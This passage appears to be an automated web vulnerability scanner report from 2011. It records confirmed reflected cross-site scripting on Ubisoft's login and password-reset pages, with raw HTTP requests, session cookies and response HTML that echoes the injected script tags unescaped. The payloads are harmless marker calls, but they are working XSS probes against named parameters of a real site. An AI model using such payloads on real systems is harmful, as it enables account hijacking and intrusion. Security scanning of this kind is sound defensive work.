<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">


<tr>
<td>&nbsp;</td>
<td><b class="errormessage">The user name you entered is invalid. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td><font class="fieldname">User Name or Email</font></td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="150" value="'"--></style></script><script>netsparker(0x0003E5)</script>" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td><font class="fieldname">Password</font></td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="3" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td><a class="link" tabindex=-1 href="/login/ForgotPassword.aspx">Forgot your password?</a></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td><table border="0" cellpadding="0" cellspacing="0"> <tr> <td rowspan="2"><input type="checkbox" name="RememberPassword" value="1"></td> <td rowspan="2"><img src="/login/Skins/images/b.gif" width="5" height="0" border="0" alt=""></td> <td class="content">Remember me on this computer</td> </tr> <tr> <td valign="top"> <a class="link" tabIndex=-1 href='/login/Help.aspx'>What does this mean?</a> </td> </tr></table></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>


<input type="hidden" name="_buttonClicked" id="_buttonClicked" value="submit">

<tr>
<td/>
<td height="30" />
</tr>
<tr>
<td/>
<td><input type="image" name="m_ImageButtonSubmit" id="m_ImageButtonSubmit" onclick="document.forms['UIMForm']._buttonClicked.value='submit';return true;" OnMouseOver="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit_over.gif')" OnMouseOut="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit.gif')" src="/login/Skins/default/en-US/btn_Submit.gif" alt="" border="0" />
<a OnMouseOver="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel_over.gif')" OnMouseOut="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel.gif')" href="http://www.ubi.com/US/"><img id="m_ImageCancel" src="/login/Skins/default/en-US/btn_Cancel.gif" alt="" border="0" /></a></td>
</tr>




</table>

</div>
<div style="clear:both;"></div>

<table>
<tr>
<td>

<!--FOOTER en-US-->
<div id="footer">

<div style="float:right; margin-top:5px;">
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy"><img src="/login/Skins/images/ectppsubisoft.gif" alt="" border="0" /></a>
</div>

<p>
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy">Privacy Policy</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=TermsOfUse">Terms of Use</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=Legal">Legal Info</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=ContactUs">Contact Us</a> |
<a href="http://www.ubisoftgroup.com/Jobs/Default.aspx?country=US">Employment</a> |
<a href="http://www.ubisoftgroup.com/MediaCenter/Default.aspx?lang=en-US">Presse</A> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=About">About Ubisoft</A>
</p>
<p>© 2008 Ubisoft Entertainment. All Rights Reserved.<br/>
Ubisoft, Ubi.com and the Ubisoft logo are trademarks of Ubisoft Entertainment in the U.S. and/or other countries.</p>
</div>
<!--END FOOTER en-US-->
<tr><td>
<!-- Ubi stat code start -->
<script type='text/javascript'>
<!--
ubi_tag = 'WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN';
ubi_system = 'WEB';
ubi_umon_domain = 'uts.ubi.com';
ubi_umon_protocol = 'https';
-->
</script>
<script type='text/javascript' src='https://uts.ubi.com/scripts/umon2.1.js'>
</script>
<noscript>
<img height=1 width=1 src='https://uts.ubi.com/stats.aspx?system=WEB&tag=WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN&ref=https%3a%2f%2fsecure.ubi.com%2flogin%2fLogin.aspx'>
</noscript>
<!-- Ubi stat code end -->
</td></tr>
</td>
</tr>
</table>


</div>
<div style="clear:both;"></div>

</div>

</tr>
</td>
</table>







<div id="toolTipLayerSizeDetect" style="position:absolute; visibility: hidden; left:0;"></div>
<div id="toolTipLayer" style="position:absolute; visibility: hidden; left:0;"></div>
<script language="JavaScript">
<!--
var ns4 = document.layers;
var ns6 = document.getElementById && !document.all;
var ie4 = document.all;

initToolTips();

function toolTip(msg)
{
var bLocationTop = 0;

var curHeight = 0;

putToolTipContent(msg, true, true);

if(toolTipLayerSizeDetectObject.clientHeight){
curHeight = toolTipLayerSizeDetectObject.clientHeight;
}else{
curHeight = toolTipLayerSizeDetectObject.offsetHeight;
}

if (ns4||ns6){
if (yCoordinate < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
else{
if (event.clientY < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
}

function putToolTipContent(msg, bTestDiv, bTop){
var content= '';

if (bTop)
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"><img src="/login/Skins/images/b_arrow_top.gif" width="33" height="13"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}
else
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"><img src="/login/Skins/images/b_arrow_bottom.gif" width="33" height="13"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}

if(bTestDiv){
if(ns4)
{
toolTipSTYLE_DETECT.document.write(content);
toolTipSTYLE_DETECT.document.close();
}
if(ns6)
{
document.getElementById("toolTipLayerSizeDetect").innerHTML=content;
}
if(ie4)
{
document.all("toolTipLayerSizeDetect").innerHTML=content;
}
}else{
if(ns4)
{
toolTipSTYLE.document.write(content);
toolTipSTYLE.document.close();
toolTipSTYLE.visibility = "visible";
}
if(ns6)
{
document.getElementById("toolTipLayer").innerHTML = content;
toolTipSTYLE.display='block';
}
if(ie4)
{
document.all("toolTipLayer").innerHTML=content;
toolTipSTYLE.display='block';
}
}
}

//-->
</script>

<..
- /login/Login.aspx

/login/Login.aspx CONFIRMED

https://secure.ubi.com/login/Login.aspx

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==
login POST 3
password POST '"--></style></script><script>alert(0x0003FB)</script>
_buttonClicked POST submit
m_ImageButtonSubmit.x POST 0
m_ImageButtonSubmit.y POST 0

Request

POST /login/Login.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/Login.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 237
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg%3d%3d&login=3&password='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0003FB)%3c%2fscript%3e&_buttonClicked=submit&m_ImageButtonSubmit.x=0&m_ImageButtonSubmit.y=0

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:27:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13560


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Log In</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="Login.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">


<tr>
<td>&nbsp;</td>
<td><b class="errormessage">The user name/password combination you entered is not correct. Double check the user name and password, then try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td><font class="fieldname">User Name or Email</font></td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="150" value="3" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td><font class="fieldname">Password</font></td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="'"--></style></script><script>netsparker(0x0003FB)</script>" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td><a class="link" tabindex=-1 href="/login/ForgotPassword.aspx">Forgot your password?</a></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td><table border="0" cellpadding="0" cellspacing="0"> <tr> <td rowspan="2"><input type="checkbox" name="RememberPassword" value="1"></td> <td rowspan="2"><img src="/login/Skins/images/b.gif" width="5" height="0" border="0" alt=""></td> <td class="content">Remember me on this computer</td> </tr> <tr> <td valign="top"> <a class="link" tabIndex=-1 href='/login/Help.aspx'>What does this mean?</a> </td> </tr></table></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>


<input type="hidden" name="_buttonClicked" id="_buttonClicked" value="submit">

<tr>
<td/>
<td height="30" />
</tr>
<tr>
<td/>
<td><input type="image" name="m_ImageButtonSubmit" id="m_ImageButtonSubmit" onclick="document.forms['UIMForm']._buttonClicked.value='submit';return true;" OnMouseOver="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit_over.gif')" OnMouseOut="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit.gif')" src="/login/Skins/default/en-US/btn_Submit.gif" alt="" border="0" />
<a OnMouseOver="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel_over.gif')" OnMouseOut="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel.gif')" href="http://www.ubi.com/US/"><img id="m_ImageCancel" src="/login/Skins/default/en-US/btn_Cancel.gif" alt="" border="0" /></a></td>
</tr>




</table>

</div>
<div style="clear:both;"></div>

<table>
<tr>
<td>

<!--FOOTER en-US-->
<div id="footer">

<div style="float:right; margin-top:5px;">
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy"><img src="/login/Skins/images/ectppsubisoft.gif" alt="" border="0" /></a>
</div>

<p>
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy">Privacy Policy</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=TermsOfUse">Terms of Use</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=Legal">Legal Info</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=ContactUs">Contact Us</a> |
<a href="http://www.ubisoftgroup.com/Jobs/Default.aspx?country=US">Employment</a> |
<a href="http://www.ubisoftgroup.com/MediaCenter/Default.aspx?lang=en-US">Presse</A> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=About">About Ubisoft</A>
</p>
<p>© 2008 Ubisoft Entertainment. All Rights Reserved.<br/>
Ubisoft, Ubi.com and the Ubisoft logo are trademarks of Ubisoft Entertainment in the U.S. and/or other countries.</p>
</div>
<!--END FOOTER en-US-->
<tr><td>
<!-- Ubi stat code start -->
<script type='text/javascript'>
<!--
ubi_tag = 'WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN';
ubi_system = 'WEB';
ubi_umon_domain = 'uts.ubi.com';
ubi_umon_protocol = 'https';
-->
</script>
<script type='text/javascript' src='https://uts.ubi.com/scripts/umon2.1.js'>
</script>
<noscript>
<img height=1 width=1 src='https://uts.ubi.com/stats.aspx?system=WEB&tag=WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN&ref=https%3a%2f%2fsecure.ubi.com%2flogin%2fLogin.aspx'>
</noscript>
<!-- Ubi stat code end -->
</td></tr>
</td>
</tr>
</table>


</div>
<div style="clear:both;"></div>

</div>

</tr>
</td>
</table>







<div id="toolTipLayerSizeDetect" style="position:absolute; visibility: hidden; left:0;"></div>
<div id="toolTipLayer" style="position:absolute; visibility: hidden; left:0;"></div>
<script language="JavaScript">
<!--
var ns4 = document.layers;
var ns6 = document.getElementById && !document.all;
var ie4 = document.all;

initToolTips();

function toolTip(msg)
{
var bLocationTop = 0;

var curHeight = 0;

putToolTipContent(msg, true, true);

if(toolTipLayerSizeDetectObject.clientHeight){
curHeight = toolTipLayerSizeDetectObject.clientHeight;
}else{
curHeight = toolTipLayerSizeDetectObject.offsetHeight;
}

if (ns4||ns6){
if (yCoordinate < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
else{
if (event.clientY < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
}

function putToolTipContent(msg, bTestDiv, bTop){
var content= '';

if (bTop)
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"><img src="/login/Skins/images/b_arrow_top.gif" width="33" height="13"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}
else
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"><img src="/login/Skins/images/b_arrow_bottom.gif" width="33" height="13"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}

if(bTestDiv){
if(ns4)
{
toolTipSTYLE_DETECT.document.write(content);
toolTipSTYLE_DETECT.document.close();
}
if(ns6)
{
document.getElementById("toolTipLayerSizeDetect").innerHTML=content;
}
if(ie4)
{
document.all("toolTipLayerSizeDetect").innerHTML=content;
}
}else{
if(ns4)
{
toolTipSTYLE.document.write(content);
toolTipSTYLE.document.close();
toolTipSTYLE.visibility = "visible";
}
if(ns6)
{
document.getElementById("toolTipLayer").innerHTML = content;
toolTipSTYLE.display='block';
}
if(ie4)
{
document.all("toolTipLayer").innerHTML=content;
toolTipSTYLE.display='block';
}
}
- /login/ForgotPassword.aspx

/login/ForgotPassword.aspx CONFIRMED

https://secure.ubi.com/login/ForgotPassword.aspx

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz7T7OeCCTsLqtgRXk0b2JwMM7a1ag==
email POST '"--></style></script><script>alert(0x000404)</script>
birthdate POST 3
_buttonClicked POST submit
m_ImageButtonSubmit POST 3

Request

POST /login/ForgotPassword.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/ForgotPassword.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 212
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz7T7OeCCTsLqtgRXk0b2JwMM7a1ag%3d%3d&email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000404)%3c%2fscript%3e&birthdate=3&_buttonClicked=submit&m_ImageButtonSubmit=3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:27:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18125


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Forgot Your Password?</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="ForgotPassword.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz7T7OeCCTsLqtgRXk0b2JwMM7a1ag==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2"><img src="/login/Skins/default/en-US/tl_forgotten_password.gif" border="0" /></td>
</tr>
<tr><td></td><td class="mainMessage"><br><br>For security reasons, we don't send passwords via email. You must reset your password. Enter your email address and Date Of Birth, to receive instructions on password resetting.</td></tr>

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">


<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td><font class="fieldnameerror">Email</font></td>
</tr>
<tr>
<td/>
<td><input id="email" name="email" type="text" maxlength="150" value="'"--></style></script><script>netsparker(0x000404)</script>" class="inputloginerror"></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td><font class="fieldname">Date of Birth</font></td>
</tr>
<tr>
<td/>
<td><select id="birthdate_m" name="birthdate" class="inputlogindate"><option>------</option><option value="m1">Jan</option><option value="m2">Feb</option><option value="m3">Mar</option><option value="m4">Apr</option><option value="m5">May</option><option value="m6">Jun</option><option value="m7">Jul</option><option value="m8">Aug</option><option value="m9">Sep</option><option value="m10">Oct</option><option value="m11">Nov</option><option value="m12">Dec</option></select><select id="birthdate_d" name="birthdate" class="inputlogindate"><option>------</option><option value="d1">1</option><option value="d2">2</option><option value="d3">3</option><option value="d4">4</option><option value="d5">5</option><option value="d6">6</option><option value="d7">7</option><option value="d8">8</option><option value="d9">9</option><option value="d10">10</option><option value="d11">11</option><option value="d12">12</option><option value="d13">13</option><option value="d14">14</option><option value="d15">15</option><option value="d16">16</option><option value="d17">17</option><option value="d18">18</option><option value="d19">19</option><option value="d20">20</option><option value="d21">21</option><option value="d22">22</option><option value="d23">23</option><option value="d24">24</option><option value="d25">25</option><option value="d26">26</option><option value="d27">27</option><option value="d28">28</option><option value="d29">29</option><option value="d30">30</option><option value="d31">31</option></select><select id="birthdate_y" name="birthdate" class="inputlogindate"><option>------</option><option value="y2011">2011</option><option value="y2010">2010</option><option value="y2009">2009</option><option value="y2008">2008</option><option value="y2007">2007</option><option value="y2006">2006</option><option value="y2005">2005</option><option value="y2004">2004</option><option value="y2003">2003</option><option value="y2002">2002</option><option value="y2001">2001</option><option value="y2000">2000</option><option value="y1999">1999</option><option value="y1998">1998</option><option value="y1997">1997</option><option value="y1996">1996</option><option value="y1995">1995</option><option value="y1994">1994</option><option value="y1993">1993</option><option value="y1992">1992</option><option value="y1991">1991</option><option value="y1990">1990</option><option value="y1989">1989</option><option value="y1988">1988</option><option value="y1987">1987</option><option value="y1986">1986</option><option value="y1985">1985</option><option value="y1984">1984</option><option value="y1983">1983</option><option value="y1982">1982</option><option value="y1981">1981</option><option value="y1980">1980</option><option value="y1979">1979</option><option value="y1978">1978</option><option value="y1977">1977</option><option value="y1976">1976</option><option value="y1975">1975</option><option value="y1974">1974</option><option value="y1973">1973</option><option value="y1972">1972</option><option value="y1971">1971</option><option value="y1970">1970</option><option value="y1969">1969</option><option 